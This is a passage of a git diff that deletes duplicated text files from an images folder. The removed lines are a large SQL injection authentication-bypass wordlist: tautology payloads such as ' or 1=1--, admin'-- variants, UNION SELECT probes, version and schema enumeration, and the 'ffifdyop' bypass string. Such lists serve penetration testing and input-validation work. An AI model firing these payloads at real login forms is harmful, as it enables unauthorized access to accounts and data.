-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
